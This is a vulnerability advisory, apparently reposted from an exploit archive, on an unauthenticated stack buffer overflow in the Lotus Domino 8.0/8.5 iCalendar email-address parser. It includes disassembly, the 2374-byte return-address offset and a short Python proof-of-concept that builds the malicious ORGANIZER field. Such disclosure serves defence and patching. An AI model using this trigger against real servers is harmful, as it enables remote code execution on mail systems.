IBM Lotus Domino iCalendar – Email Address Stack Buffer Overflow

  • 作者: A. Plaskett
    日期: 2010-09-14
  • 类别:
  • 来源:
  • source:
    IBM Lotus Domino iCalendar Email Address Stack Buffer Overflow Vulnerability
    Package Name: Lotus Domino Server
    Date Reported:2010-01-09
    Affected Versions:Versions 8.0 and 8.5 on AIX, AIX 64bit, Linux, Linux iSeries, Linux
    zSeries, Solaris, Windows, Windows 64bit, z/OS
    CVE Reference Not Yet Assigned
    AuthorA. Plaskett
    SeverityHigh Risk
    ImpactThe vulnerability would enable an attacker to execute arbitrary code
    on the system in the context of the currently executing nrouter process.
    Vulnerability Class Stack based buffer overflow
    Vendor URL
    Version 8.0, 8.5
    Vendor Response A patch is available from: http://www-
    An unauthenticated remote code execution vulnerability was identified in the code
    handling the conversion and checking of an iCalendar email address parameter. An
    overly large email address string can lead to the overflow of a stack allocated buffer
    due to insufficient bounds checking when a CStrcpy (string copy) is performed. A
    remote, unauthenticated attacker could execute code in the context of the Lotus
    Domino server process (nrouter.exe) by sending a specially crafted malicious email
    to the Lotus Domino SMTP server.
    Technical Background
    The vulnerability exists due to a lack of bounds checking performed in the function
    “nnotes!MailCheck821Address” before performing a string copy operation (Cstrcpy).
    .text:602738F7 push esi
    .text:602738F8 push edx
    .text:602738F9 call Cstrcpy
    The ESI register holds the source address of the copy, which is read from the
    iCalendar email and so is under an attacker’s control. The EDX register holds the
    address of the fixed size stack buffer.
    Consequently, the Cstrcpy operation can be passed a string which overflows the
    fixed size stack based buffer and causes memory corruption. This memory corruption
    can be used to hijack the flow of execution of the program and execute arbitrary
    Exploit Information
    An attacker could exploit this vulnerability by crafting an email containing an
    iCalendar with an email address string which is sufficiently long to overwrite stack
    based variables and also overwrite the saved return address which is stored in the
    stack frame (the required string length being 2374 bytes). The attacker could then
    pass an address which would be used to overwrite the saved return address. When
    the function returns, the return address is popped off the stack and loaded into the
    EIP (Extended Instruction Pointer) register. At this point, the attacker has full control
    over the execution of the program and can execute their desired code.
    The following proof of concept Python code excerpt can be used to trigger the
    vulnerability with the malicious ORGANIZER mailto address:
    ret_address = “BBBB”
    overflow = ("A" * 2374) + ret_address + ("C" * 6632)
    organiser = "" % overflow
    body = "Content-Type: text/calendar; method=COUNTER; charset="UTF-8"
    Subject: sent_mail2.txt
    MIME-Version: 1.0
    Content-Transfer-Encoding: 8bit
    “”” % organiser
    If this email is delivered to a Lotus Domino SMTP server, nrouter will perform the
    following calls: -
    0833519c 60ca844c 094dddb8 nnotes!MailCheck821Address+0xb07
    0833519c 00000019 083200f8 nnotes!Note2iCal+0x1c25c
    0000000a 083200f8 094de824 nnotes!iCal2NotesExtract+0x247
    000000c7 06e41f62 083210ac nRouter+0x3ee9e
    00000063 000000c7 06e41f62 nRouter+0x3f1cd
    02a19f58 00000000 000000c7 nRouter+0x1c433
    004673a0 00000000 03f23325 nRouter+0x1ddd0
    004673a0 21700001 00000001 nRouter+0x1e3a5
    029b0000 00000000 00000000 nRouter+0x1e6ed
    00000000 094dffd4 7751b3f5 nnotes!OSProcessIsGUI+0xef
    00000000 7e454e05 00000000 kernel32!BaseThreadInitThunk+0x12
    600fe640 00000000 00000000 ntdll!RtlInitializeExceptionChain+0x63
    600fe640 00000000 00000000 ntdll!RtlInitializeExceptionChain+0x36
    Leading to the incorrectly bounded Cstrcpy function being called and the return
    address being overwritten with 42424242, which will then be loaded into the EIP
    register. At this point the attacker has full control over the flow of execution of the
    program (nrouter.exe).
    In order to exploit this vulnerability an attacker would need to know the email
    address of a valid Lotus Domino mailbox account. It should be noted, however, that
    no user interaction is required for the vulnerability to be triggered (nrouter will
    process the email automatically).